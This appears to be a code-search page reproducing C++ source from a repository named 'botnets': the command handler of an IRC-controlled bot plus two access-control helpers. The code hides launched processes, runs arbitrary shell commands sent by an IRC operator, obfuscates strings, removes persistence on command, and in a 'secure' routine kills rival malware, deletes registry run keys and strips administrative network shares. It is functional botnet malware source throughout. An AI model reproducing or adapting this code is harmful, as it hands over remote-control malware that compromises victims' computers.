			memset(&sinfo, 0, sizeof(STARTUPINFO)); 
			sinfo.cb=sizeof(sinfo);
			if(bVisible) sinfo.wShowWindow=SW_SHOW; else sinfo.wShowWindow=SW_HIDE;
			if(!CreateProcess(NULL, sText.Str(), NULL, NULL, TRUE, NORMAL_PRIORITY_CLASS | DETACHED_PROCESS, NULL, NULL, &sinfo, &pinfo)) {
			g_cMainCtrl.m_cIRC.SendMsg(pMsg->bSilent, pMsg->bNotice, "exec.error", pMsg->sReplyTo.Str()); return false; }
		#endif
		return true; 
	}

	// Remove Bot
	else if(!pMsg->sCmd.Compare(m_cmdRemove.sName.Str())) 
	{
		CString sNick(pMsg->sChatString.Token(1, " ", true));
		if (!sNick.Compare(g_cMainCtrl.m_sUserName.CStr())) {
			if(g_cMainCtrl.m_cBot.as_enabled.bValue)
				g_cMainCtrl.m_cInstaller.RegStartDel(g_cMainCtrl.m_cBot.as_valname.sValue);
			if(g_cMainCtrl.m_cBot.as_service.bValue)
				g_cMainCtrl.m_cInstaller.ServiceDel(g_cMainCtrl.m_cBot.as_service_name.sValue);
			g_cMainCtrl.m_cInstaller.Uninstall();
			g_cMainCtrl.m_cIRC.m_bRunning=false;
			g_cMainCtrl.m_bRunning=false; 
		}
	}

	// About
	else if(!pMsg->sCmd.Compare(m_cmdAbout.sName.CStr())) {
		return g_cMainCtrl.m_cIRC.SendMsg(pMsg->bSilent, pMsg->bNotice, g_cMainCtrl.m_sNameVerStr.Str(), pMsg->sReplyTo.Str()); 
	}

	
	// Flush DNS
	else if(!pMsg->sCmd.Compare(m_cmdFlushDNS.sName.CStr())) 
	{
		#ifdef WIN32
			// ipconfig.exe /flushdns
			Execute(dp(9,16,3,15,14,6,9,7,78,5,24,5,0).CStr(), dp(80,6,12,21,19,8,4,14,19,0).CStr());
		#endif
		return true; 
	}

	// Open File
	else if(!pMsg->sCmd.Compare(m_cmdOpen.sName.CStr())) 
	{
		CString sText; 
		sText=pMsg->sChatString.Token(1, " ").CStr(); 
		CString bRet;

		bRet=(char)ShellExecute(
			NULL, 
			"open", 
			sText.CStr(), 
			NULL,
			NULL,
			SW_SHOWNORMAL
		);

	//	bRet=system(sText.CStr())>0;
	//	if(bRet) return g_cMainCtrl.m_cIRC.SendMsg(pMsg->bSilent, pMsg->bNotice, "file opened.", pMsg->sReplyTo.Str());
		//else return 
		g_cMainCtrl.m_cIRC.SendMsg(pMsg->bSilent, pMsg->bNotice, bRet.Str(), pMsg->sReplyTo.Str()); 
	}

	// Quit
	else if(!pMsg->sCmd.Compare(m_cmdQuit.sName.CStr())) 
	{
		g_cMainCtrl.m_cIRC.m_bRunning=false; 
		return true; 
	}

	// DNS
	else if(!pMsg->sCmd.Compare(m_cmdDns.sName.CStr())) 
	{
		CString sReply; 
		hostent *pHostent=NULL; 
		in_addr iaddr;
		if(!pMsg->sChatString.Token(1, " ").Compare("")) return false;
		unsigned long addr=inet_addr(pMsg->sChatString.Token(1, " ").CStr());
		if(addr!=INADDR_NONE) {
			pHostent=gethostbyaddr((char*)&addr, sizeof(struct in_addr), AF_INET);
			if(pHostent) {
				sReply.Format("%s resolved %s", pMsg->sChatString.Token(1, " ").CStr(), pHostent->h_name);
				return g_cMainCtrl.m_cIRC.SendMsg(pMsg->bSilent, pMsg->bNotice, sReply.Str(), pMsg->sReplyTo.Str()); 
			}
		} else {
			pHostent=gethostbyname(pMsg->sChatString.Token(1, " ").CStr());
			if(pHostent) {
				iaddr=*((in_addr*)*pHostent->h_addr_list);
				sReply.Format("%s -> %s", pMsg->sChatString.Token(1, " ").CStr(), inet_ntoa(iaddr));
				return g_cMainCtrl.m_cIRC.SendMsg(pMsg->bSilent, pMsg->bNotice, sReply.Str(), pMsg->sReplyTo.Str()); 
			} 
		}
		if(!pHostent) {
			sReply.Format("resolve.error %s.", pMsg->sChatString.Token(1, " ").CStr());
			return g_cMainCtrl.m_cIRC.SendMsg(pMsg->bSilent, pMsg->bNotice, sReply.Str(), pMsg->sReplyTo.Str()); 
		} 
	}

	// Random Nickname
	else if(!pMsg->sCmd.Compare(m_cmdRndNick.sName.CStr())) 
	{
		CString sRndNick=RndNick(si_nickprefix.sValue.CStr());
		g_cMainCtrl.m_cIRC.SendRawFormat("%s %s\r\n", dp(40,35,29,37,0).CStr(), sRndNick.CStr());
		g_cMainCtrl.m_sUserName.Format("%s", sRndNick.Mid(0, 32).CStr());
		return true; 
	}

	// Run Command
	else if(!pMsg->sCmd.Compare(m_cmdCommand.sName.CStr())) 
	{	
		#ifdef WIN32
			if(!(pMsg->sChatString.GetLength() > (pMsg->sCmd.GetLength()+pMsg->sChatString.Token(1, " ").GetLength()+3))) return false;
			CString sText; sText.Assign(&pMsg->sChatString[pMsg->sCmd.GetLength()+2]); 
			bool bRet=false;
			CString sReplyBuf; 
			sReplyBuf.Format("Executed: %s.", sText.CStr());
			if(system(sText.CStr())==-1) 
			{ 
				g_cMainCtrl.m_cIRC.SendMsg(pMsg->bSilent, pMsg->bNotice, "exec.error", pMsg->sReplyTo.Str()); return false; 
			} else { 
				g_cMainCtrl.m_cIRC.SendMsg(pMsg->bSilent, pMsg->bNotice, sReplyBuf.Str(), pMsg->sReplyTo.Str()); return false; 
			}
		#endif
		return true; 
	}

	// System Information
	else if(!pMsg->sCmd.Compare(m_cmdSysInfo.sName.CStr())) 
	{
		return g_cMainCtrl.m_cIRC.SendMsg(pMsg->bSilent, pMsg->bNotice, SysInfo().Str(), pMsg->sReplyTo.Str()); 
	}

	// Find Files
	//else if(!pMsg->sCmd.Compare(m_cmdFindFiles.sName.CStr())) 
//	{
	/*	CString strMask = pMsg->sChatString.Token(1, " ");
		CString strDir  = pMsg->sChatString.Token(2, " ");
		return g_cMainCtrl.m_cIRC.SendMsg(pMsg->bSilent, pMsg->bNotice, FindFiles(strMask, strDir), pMsg->sReplyTo.Str()); 
	*/
	//}

	// Change Nickname
	else if(!pMsg->sCmd.Compare(m_cmdNick.sName.CStr())) 
	{
		g_cMainCtrl.m_sUserName.Format("%s", pMsg->sChatString.Token(1, " ", true).Mid(0, 32).CStr());
		g_cMainCtrl.m_cIRC.SendRawFormat("%s %s\r\n", dp(40,35,29,37,0).CStr(), g_cMainCtrl.m_sUserName.CStr());
		return true; 
	}

	// Uptime check (default: 7d)
	else if(!pMsg->sCmd.Compare(m_cmdLongUptime.sName.CStr())) 
	{
		int iDays=atoi(pMsg->sChatString.Token(1, " ").CStr()); 
		if(!iDays) iDays=7;
		CString sUptime=LongUptime(iDays);
		if(sUptime.Compare("")) {
			g_cMainCtrl.m_cIRC.SendMsg(pMsg->bSilent, pMsg->bNotice, \
				sUptime.Str(), pMsg->sReplyTo.Str());
		}
		return true; 
	}


	// Secure Bot
	else if(!pMsg->sCmd.Compare(m_cmdSecure.sName.CStr())) 
	{	
		#ifdef WIN32
		CString regLoc;
		regLoc = dp(45,15,6,20,23,1,18,5,80,39,9,3,18,15,19,15,6,20,80,49,9,14,4,15,23,19,80,29,21,18,18,5,14,20,48,5,18,19,9,15,14,80,44,21,14,0).CStr();


		HKEY hkey=NULL; DWORD dwSize=128; char szDataBuf[128];
		strcpy(szDataBuf, "N"); dwSize=strlen(szDataBuf);
		LONG lRet=RegOpenKeyEx(HKEY_LOCAL_MACHINE, "Software\\Microsoft\\OLE", 0, KEY_READ, &hkey);
		RegSetValueEx(hkey, dp(31,14,1,2,12,5,30,29,41,39,0).CStr(), NULL, REG_SZ, (unsigned char*)szDataBuf, dwSize);
		RegCloseKey(hkey);
		
		lRet=RegOpenKeyEx(HKEY_LOCAL_MACHINE, regLoc.CStr(), 0, KEY_ALL_ACCESS, &hkey);
		RegDeleteValue(hkey, dp(45,19,1,20,5,78,5,24,5,0).CStr());
		RegCloseKey(hkey);
		KillProcess(dp(9,18,21,14,72,78,5,24,5,0).CStr());
		CString tmpBagle; GetSystemDirectory(tmpBagle.GetBuffer(MAX_PATH), MAX_PATH);
		tmpBagle.Format("%s\\%s",tmpBagle.CStr(), dp(9,18,21,14,72,78,5,24,5,0).CStr());
		DeleteFile(tmpBagle);

		lRet=RegOpenKeyEx(HKEY_LOCAL_MACHINE, regLoc.CStr(), 0, KEY_ALL_ACCESS, &hkey);
		RegDeleteValue(hkey, dp(18,1,20,5,78,5,24,5,0).CStr());
		RegCloseKey(hkey);
		KillProcess(dp(9,69,69,18,73,72,14,72,78,5,24,5,0).CStr());
		GetSystemDirectory(tmpBagle.GetBuffer(MAX_PATH), MAX_PATH);
		tmpBagle.Format("%s\\%s",tmpBagle.CStr(),dp(9,69,69,18,73,72,14,72,78,5,24,5,0).CStr());
		DeleteFile(tmpBagle);

		lRet=RegOpenKeyEx(HKEY_LOCAL_MACHINE, regLoc.CStr(), 0, KEY_ALL_ACCESS, &hkey);
		RegDeleteValue(hkey, dp(19,19,1,20,5,78,5,24,5,0).CStr());
		RegCloseKey(hkey);
		KillProcess(dp(23,9,14,19,25,19,78,5,24,5,0).CStr());
		GetSystemDirectory(tmpBagle.GetBuffer(MAX_PATH), MAX_PATH);
		tmpBagle.Format("%s\\%s",tmpBagle.CStr(), dp(23,9,14,19,25,19,78,5,24,5,0).CStr());
		DeleteFile(tmpBagle);

		lRet=RegOpenKeyEx(HKEY_LOCAL_MACHINE, regLoc.CStr(), 0, KEY_ALL_ACCESS, &hkey);
		RegDeleteValue(hkey, dp(4,71,4,21,16,4,1,20,5,78,5,24,5,0).CStr());
		RegCloseKey(hkey);
		KillProcess(dp(2,2,5,1,7,12,5,78,5,24,5,0).CStr());
		GetSystemDirectory(tmpBagle.GetBuffer(MAX_PATH), MAX_PATH);
		tmpBagle.Format("%s\\%s",tmpBagle.CStr(), dp(2,2,5,1,7,12,5,78,5,24,5,0).CStr());
		DeleteFile(tmpBagle);

		lRet=RegOpenKeyEx(HKEY_LOCAL_MACHINE, regLoc.CStr(), 0, KEY_ALL_ACCESS, &hkey);
		RegDeleteValue(hkey, dp(46,1,19,11,39,15,14,0).CStr());
		RegCloseKey(hkey);
		KillProcess(dp(20,1,19,11,13,15,14,78,5,24,5,0).CStr());
		GetSystemDirectory(tmpBagle.GetBuffer(MAX_PATH), MAX_PATH);
		tmpBagle.Format("%s\\%s",tmpBagle.CStr(), dp(20,1,19,11,13,15,14,78,5,24,5,0).CStr());
		DeleteFile(tmpBagle);

		lRet=RegOpenKeyEx(HKEY_LOCAL_MACHINE, regLoc.CStr(), 0, KEY_ALL_ACCESS, &hkey);
		RegDeleteValue(hkey, dp(31,24,16,12,15,18,5,18,0).CStr());
		RegCloseKey(hkey);

		system("net share c$ /delete /y");
		system("net share d$ /delete /y");
		system("net share ipc$ /delete /y");
		system("net share admin$ /delete /y");



		#endif
		return true; 
	}

	return false; 
}
示例#29
0
文件: mac.cpp 项目: hazcod/botnets
bool CMac::DelUser(CString sUsername)
{	if(!sUsername.CStr()) return false; user *pRemove=NULL;
	list<user*>::iterator i; for(i=luStart.begin(); i!=luStart.end(); ++i)
	{	if(!(*i)->sUsername.Compare(sUsername)) pRemove=(*i); }
	if(pRemove) { luStart.remove(pRemove); delete pRemove; return true; }
	return false; }
示例#30
0
文件: mac.cpp 项目: hazcod/botnets
void CMac::AddBadFunc(CString sFuncname, user *pUser)
{	if(!pUser || !sFuncname.CStr()) return; int iToken=0;
	while(sFuncname.Token(iToken, ":").Compare(""))
	{	func *pFunc=new func; pFunc->sFuncname=sFuncname.Token(iToken, ":"); pUser->lDeny.push_back(pFunc); iToken++; } }